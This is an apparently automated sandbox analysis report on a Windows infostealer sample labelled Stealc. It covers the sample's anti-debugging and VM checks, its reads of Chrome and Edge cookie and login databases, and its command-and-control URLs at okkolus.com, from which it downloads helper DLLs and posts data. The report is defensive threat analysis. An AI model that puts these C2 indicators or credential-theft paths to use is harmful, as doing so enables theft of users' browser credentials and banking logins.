                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                      Source: DBFIDGII.0.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                      Source: DBFIDGII.0.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                      Source: DBFIDGII.0.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
                      Source: DBFIDGII.0.dr | Binary or memory string: discord.comVMware20,11696487552f
                      Source: DBFIDGII.0.dr | Binary or memory string: bankofamerica.comVMware20,11696487552x
                      Source: DBFIDGII.0.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                      Source: DBFIDGII.0.dr | Binary or memory string: ms.portal.azure.comVMware20,11696487552
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWen-GBn
                      Source: DBFIDGII.0.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                      Source: DBFIDGII.0.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                      Source: DBFIDGII.0.dr | Binary or memory string: global block list test formVMware20,11696487552
                      Source: DBFIDGII.0.dr | Binary or memory string: tasks.office.comVMware20,11696487552o
                      Source: DBFIDGII.0.dr | Binary or memory string: AMC password management pageVMware20,11696487552
                      Source: DBFIDGII.0.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
                      Source: DBFIDGII.0.dr | Binary or memory string: interactivebrokers.comVMware20,11696487552
                      Source: DBFIDGII.0.dr | Binary or memory string: dev.azure.comVMware20,11696487552j
                      Source: DBFIDGII.0.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
                      Source: DBFIDGII.0.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                      Source: DBFIDGII.0.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW`w
                      Source: DBFIDGII.0.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware^
                      Source: DBFIDGII.0.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                      Source: DBFIDGII.0.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                      Source: DBFIDGII.0.dr | Binary or memory string: outlook.office365.comVMware20,11696487552t
                      Source: DBFIDGII.0.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                      Source: FFAk2gixx5.exe, 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                      Source: DBFIDGII.0.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                      Source: DBFIDGII.0.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                      Source: DBFIDGII.0.dr | Binary or memory string: outlook.office.comVMware20,11696487552s
                      Source: DBFIDGII.0.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                      Source: DBFIDGII.0.dr | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
                      Source: DBFIDGII.0.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
                      Source: DBFIDGII.0.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
                      Source: DBFIDGII.0.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | API call chain: ExitProcess graph end node
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_00417B3E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exeCode function: 0_2_00416230 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_00415DB0 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_02C37B13 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_02FD6017 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_02FC0D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_02FC092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_00404C70 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_00419DB7 SetUnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_00417B3E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_004173CD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_61EAF900 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_02FD7634 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_02FDA01E SetUnhandledExceptionFilter,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_02FD7DA5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_00415CF0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_02FD5F57 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,GetSystemTimes,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_004143B0 GetProcessHeap,HeapAlloc,GetUserNameA,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_004144A0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

                      Stealing of Sensitive Information

                      Source: Yara match | File source: 0.2.FFAk2gixx5.exe.2fc0e67.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.3.FFAk2gixx5.exe.2ff0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.3.FFAk2gixx5.exe.2ff0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.FFAk2gixx5.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.FFAk2gixx5.exe.2fc0e67.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.3314009365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.2531825122.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: FFAk2gixx5.exe PID: 6784, type: MEMORYSTR
                      Source: Yara match | File source: dump.pcap, type: PCAP
                      Source: Yara match | File source: 0.2.FFAk2gixx5.exe.2fc0e67.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.3.FFAk2gixx5.exe.2ff0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.3.FFAk2gixx5.exe.2ff0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.FFAk2gixx5.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.FFAk2gixx5.exe.2fc0e67.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.3314009365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.2531825122.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                      Source: Yara match | File source: Process Memory Space: FFAk2gixx5.exe PID: 6784, type: MEMORYSTR

                      Remote Access Functionality

                      Source: Yara match | File source: 0.2.FFAk2gixx5.exe.2fc0e67.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.3.FFAk2gixx5.exe.2ff0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.3.FFAk2gixx5.exe.2ff0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.FFAk2gixx5.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.FFAk2gixx5.exe.2fc0e67.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.3314009365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.2531825122.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: FFAk2gixx5.exe PID: 6784, type: MEMORYSTR
                      Source: Yara match | File source: dump.pcap, type: PCAP
                      Source: Yara match | File source: 0.2.FFAk2gixx5.exe.2fc0e67.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.FFAk2gixx5.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.3.FFAk2gixx5.exe.2ff0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.3.FFAk2gixx5.exe.2ff0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.FFAk2gixx5.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.FFAk2gixx5.exe.2fc0e67.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000000.00000002.3315854062.0000000002FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.3314009365.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000003.2531825122.0000000002FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_61E1307A sqlite3_transfer_bindings,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_61E2D5E6 sqlite3_bind_int64,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_61E2D595 sqlite3_bind_double,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_61E0B431 sqlite3_clear_bindings,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_61E037F3 sqlite3_value_frombind,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_61E2D781 sqlite3_bind_zeroblob64,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_61E2D714 sqlite3_bind_zeroblob,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_61E2D68C sqlite3_bind_pointer,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_61E2D65B sqlite3_bind_null,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_61E2D635 sqlite3_bind_int,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_61E2D9B0 sqlite3_bind_value,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_61E2D981 sqlite3_bind_text16,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_61E2D945 sqlite3_bind_text64,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_61E2D916 sqlite3_bind_text,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_61E2D8E7 sqlite3_bind_blob64,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_61E038CA sqlite3_bind_parameter_count,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_61E158CA sqlite3_bind_parameter_index,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_61E038DC sqlite3_bind_parameter_name,
                      Source: C:\Users\user\Desktop\FFAk2gixx5.exe | Code function: 0_2_61E2D8B8 sqlite3_bind_blob,
MITRE ATT&CK Matrix (techniques with at least one matching signature; the number in brackets is the signature count):

Execution: Native API (11)
Persistence: DLL Side-Loading (1)
Privilege Escalation: Process Injection (1); DLL Side-Loading (1)
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (1); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (2); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (1)
Discovery: System Time Discovery (2); Security Software Discovery (21); Virtualization/Sandbox Evasion (1); Process Discovery (11); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (2); System Information Discovery (133)
Collection: Archive Collected Data (1); Data from Local System (1)
Command and Control: Encrypted Channel (2); Ingress Tool Transfer (12); Non-Application Layer Protocol (3); Application Layer Protocol (113)
Reconnaissance, Resource Development, Initial Access, Lateral Movement, Exfiltration, Impact: no matching signatures (the original matrix shows only the unhit placeholder technique names for these tactics).
Antivirus detection, submitted file:

Source | Detection | Scanner | Label
FFAk2gixx5.exe | 71% | ReversingLabs | Win32.Trojan.Stealc
FFAk2gixx5.exe | 68% | Virustotal | -
FFAk2gixx5.exe | 100% | Joe Sandbox ML | -

Antivirus detection, dropped files:

Source | Detection | Scanner
C:\ProgramData\freebl3.dll | 0% | ReversingLabs
C:\ProgramData\mozglue.dll | 0% | ReversingLabs
C:\ProgramData\msvcp140.dll | 0% | ReversingLabs
C:\ProgramData\nss3.dll | 0% | ReversingLabs
C:\ProgramData\softokn3.dll | 0% | ReversingLabs
C:\ProgramData\vcruntime140.dll | 5% | ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll | 0% | ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll | 5% | ReversingLabs

No Antivirus matches

Antivirus detection, domains:

Source | Detection | Scanner | Label
okkolus.com | 11% | Virustotal | -

Antivirus detection, URLs. Most of these strings were carved from process memory; the characters after ".dll" or ".php" (nss3.dllll, mozglue.dllrowser, .php&) and so on) are adjacent bytes picked up by the string scanner, not distinct paths. The URLs the sample actually requested are the clean ones in the contacted-URL table further down.

Source | Detection | Scanner | Label
https://mozilla.org0/ | 0% | URL Reputation | safe
https://ac.ecopnacl | 0% | URL Reputation | safe
https://ac.ecop | 0% | URL Reputation | safe
http://okkolus.com/dfaf16606234b71d/nss3.dllll | 0% | Avira URL Cloud | safe
http://okkolus.com/dfaf16606234b71d/vcruntime140.dllata | 0% | Avira URL Cloud | safe
http://okkolus.com/dfaf16606234b71d/msvcp140.dlluPh | 0% | Avira URL Cloud | safe
http://okkolus.com | 0% | Avira URL Cloud | safe
http://okkolus.com/dfaf16606234b71d/msvcp140.dll. | 0% | Avira URL Cloud | safe
http://okkolus.com | 11% | Virustotal | -
http://okkolus.com/dfaf16606234b71d/softokn3.dll | 0% | Avira URL Cloud | safe
http://okkolus.com/cf5cbdf706840b3f. | 0% | Avira URL Cloud | safe
http://okkolus.com/dfaf16606234b71d/nss3.dll.U | 0% | Avira URL Cloud | safe
http://okkolus.com/dfaf16606234b71d/mozglue.dllrowser | 0% | Avira URL Cloud | safe
http://okkolus.com/dfaf16606234b71d/nss3.dllll | 1% | Virustotal | -
http://okkolus.com/dfaf16606234b71d/mozglue.dll | 0% | Avira URL Cloud | safe
http://okkolus.com/cf5cbdf706840b3f.php&) | 0% | Avira URL Cloud | safe
http://okkolus.com/dfaf16606234b71d/mozglue.dll94eaf2a9d1d275a40e443fa5Extension | 0% | Avira URL Cloud | safe
http://okkolus.com/dfaf16606234b71d/mozglue.dllVUG | 0% | Avira URL Cloud | safe
http://okkolus.com/dfaf16606234b71d/softokn3.dll | 1% | Virustotal | -
http://okkolus.com/dfaf16606234b71d/nss3.dllpatible_edge_version_number | 0% | Avira URL Cloud | safe
http://okkolus.com/dfaf16606234b71d/softokn3.dller | 0% | Avira URL Cloud | safe
http://okkolus.com/dfaf16606234b71d/nss3.dlle | 0% | Avira URL Cloud | safe
http://okkolus.com/dfaf16606234b71d/freebl3.dll | 0% | Avira URL Cloud | safe
http://okkolus.com/dfaf16606234b71d/mozglue.dll | 3% | Virustotal | -
http://okkolus.com/dfaf16606234b71d/vcruntime140.dll | 0% | Avira URL Cloud | safe
http://okkolus.com/dfaf16606234b71d/ra | 0% | Avira URL Cloud | safe
http://okkolus.com/dfaf16606234b71d/msvcp140.dller | 0% | Avira URL Cloud | safe
http://okkolus.com/cf5cbdf706840b3f.phpN | 0% | Avira URL Cloud | safe
http://okkolus.com/dfaf16606234b71d/freebl3.dll | 3% | Virustotal | -
http://okkolus.com/dfaf16606234b71d/ | 0% | Avira URL Cloud | safe
http://okkolus.com/cf5cbdf706840b3f.phpte3.dll | 0% | Avira URL Cloud | safe
http://okkolus.com/dfaf16606234b71d/vcruntime140.dll | 1% | Virustotal | -
http://okkolus.com/dfaf16606234b71d/softokn3.dll. | 0% | Avira URL Cloud | safe
http://okkolus.com/dfaf16606234b71d/ | 1% | Virustotal | -
http://okkolus.com/dfaf16606234b71d/softokn3.dllCSF | 0% | Avira URL Cloud | safe
http://okkolus.com/dfaf16606234b71d/nss3.dllll_TH | 0% | Avira URL Cloud | safe
http://okkolus.com/cf5cbdf706840b3f.phpte3.dll | 4% | Virustotal | -
http://okkolus.com/dfaf16606234b71d/freebl3.dll94eaf2a9d1d275a40e443fa5tionComponent | 0% | Avira URL Cloud | safe
http://okkolus.com/cf5cbdf706840b3f.phpN | 4% | Virustotal | -
http://okkolus.com/dfaf16606234b71d/oTab | 0% | Avira URL Cloud | safe
http://okkolus.com/dfaf16606234b71d/mozglue.dllser | 0% | Avira URL Cloud | safe
http://okkolus.com/dfaf16606234b71d/soft | 0% | Avira URL Cloud | safe
http://okkolus.com/dfaf16606234b71d/softokn3.dller | 1% | Virustotal | -
http://okkolus.com/cf5cbdf706840b3f.php | 100% | Avira URL Cloud | malware
http://okkolus.com/cf5cbdf706840b3f.php6c3c10c894eaf2a9d1d275a40e443fa5cations | 0% | Avira URL Cloud | safe
http://okkolus.com/dfaf16606234b71d/vcruntime140.dll% | 0% | Avira URL Cloud | safe
http://okkolus.com/dfaf16606234b71d/nss3.dll9M | 0% | Avira URL Cloud | safe
http://okkolus.comppData | 0% | Avira URL Cloud | safe
http://okkolus.com/cf5cbdf706840b3f.php | 13% | Virustotal | -
http://okkolus.com/dfaf16606234b71d/msvcp140.dll | 0% | Avira URL Cloud | safe
http://okkolus.com/dfaf16606234b71d/sqlite3.dll | 0% | Avira URL Cloud | safe
http://okkolus.com/dfaf16606234b71d/nss3.dlle | 5% | Virustotal | -
http://okkolus.com/dfaf16606234b71d/nss3.dll | 0% | Avira URL Cloud | safe
http://okkolus.com/cf5cbdf706840b3f.php/M | 100% | Avira URL Cloud | malware
http://okkolus.com/cf5cbdf706840b3f.phpt | 0% | Avira URL Cloud | safe
http://okkolus.com/dfaf16606234b71d/nss3.dllJT | 0% | Avira URL Cloud | safe
http://okkolus.com/dfaf16606234b71d/nss3.dlloU | 0% | Avira URL Cloud | safe
http://okkolus.com/dfaf16606234b71d/nss3.dll | 3% | Virustotal | -
http://okkolus.com/dfaf16606234b71d/mozglue.dlld | 0% | Avira URL Cloud | safe
http://okkolus.com/dfaf16606234b71d/nss3.dllllx | 0% | Avira URL Cloud | safe
http://okkolus.com/dfaf16606234b71d/sqlite3.dll | 4% | Virustotal | -
http://okkolus.com/dfaf16606234b71d/msvcp140.dll | 3% | Virustotal | -
Contacted domains:

Name | IP | Active | Malicious | Antivirus Detection | Reputation
okkolus.com | 31.41.44.147 | true | true | - | unknown
Contacted URLs:

Name | Malicious | Antivirus Detection | Reputation
http://okkolus.com/dfaf16606234b71d/softokn3.dll | true | Virustotal 1%; Avira URL Cloud: safe | unknown
http://okkolus.com/dfaf16606234b71d/mozglue.dll | true | Virustotal 3%; Avira URL Cloud: safe | unknown
http://okkolus.com/dfaf16606234b71d/freebl3.dll | true | Virustotal 3%; Avira URL Cloud: safe | unknown
http://okkolus.com/dfaf16606234b71d/vcruntime140.dll | true | Virustotal 1%; Avira URL Cloud: safe | unknown
http://okkolus.com/cf5cbdf706840b3f.php | true | Virustotal 13%; Avira URL Cloud: malware | unknown
http://okkolus.com/dfaf16606234b71d/msvcp140.dll | true | Virustotal 3%; Avira URL Cloud: safe | unknown
http://okkolus.com/dfaf16606234b71d/sqlite3.dll | true | Virustotal 4%; Avira URL Cloud: safe | unknown
http://okkolus.com/dfaf16606234b71d/nss3.dll | true | Virustotal 3%; Avira URL Cloud: safe | unknown
URLs from memory and dropped files:

Source key (memory dumps of FFAk2gixx5.exe referenced in the Source column):
[A] 00000000.00000002.3315706201.0000000002C87000.00000004.00000020.00020000.00000000.sdmp
[B] 00000000.00000002.3315706201.0000000002C4C000.00000004.00000020.00020000.00000000.sdmp
[C] 00000000.00000002.3314009365.0000000000447000.00000040.00000001.01000000.00000003.sdmp
[D] 00000000.00000002.3315706201.0000000002CAB000.00000004.00000020.00020000.00000000.sdmp
[E] 00000000.00000002.3315706201.0000000002CA4000.00000004.00000020.00020000.00000000.sdmp
[F] 00000000.00000002.3326407277.000000001D119000.00000004.00000020.00020000.00000000.sdmp
[G] 00000000.00000002.3334018362.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp
[H] 00000000.00000002.3314009365.0000000000549000.00000040.00000001.01000000.00000003.sdmp

Name | Source | Malicious | Antivirus Detection | Reputation
http://okkolus.com/dfaf16606234b71d/msvcp140.dlluPh | [A] | false | Avira URL Cloud: safe | unknown
http://okkolus.com | [B], [C] | true | Virustotal 11%; Avira URL Cloud: safe | unknown
https://duckduckgo.com/chrome_newtab | JEHIJDGI.0.dr | false | - | high
https://duckduckgo.com/ac/?q= | [D], JEHIJDGI.0.dr | false | - | high
http://okkolus.com/dfaf16606234b71d/vcruntime140.dllata | [C] | false | Avira URL Cloud: safe | unknown
http://okkolus.com/dfaf16606234b71d/msvcp140.dll. | [A] | false | Avira URL Cloud: safe | unknown
http://okkolus.com/dfaf16606234b71d/nss3.dllll | [D], [A] | false | Virustotal 1%; Avira URL Cloud: safe | unknown
http://okkolus.com/cf5cbdf706840b3f. | [D] | true | Avira URL Cloud: safe | unknown
http://okkolus.com/dfaf16606234b71d/nss3.dll.U | [D] | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | [D], JEHIJDGI.0.dr | false | - | high
http://okkolus.com/dfaf16606234b71d/mozglue.dllrowser | [A] | false | Avira URL Cloud: safe | unknown
http://okkolus.com/cf5cbdf706840b3f.php&) | [E] | false | Avira URL Cloud: safe | unknown
http://okkolus.com/dfaf16606234b71d/mozglue.dll94eaf2a9d1d275a40e443fa5Extension | [C] | false | Avira URL Cloud: safe | unknown
http://okkolus.com/dfaf16606234b71d/mozglue.dllVUG | [D] | false | Avira URL Cloud: safe | unknown
http://okkolus.com/dfaf16606234b71d/nss3.dllpatible_edge_version_number | [D] | false | Avira URL Cloud: safe | unknown
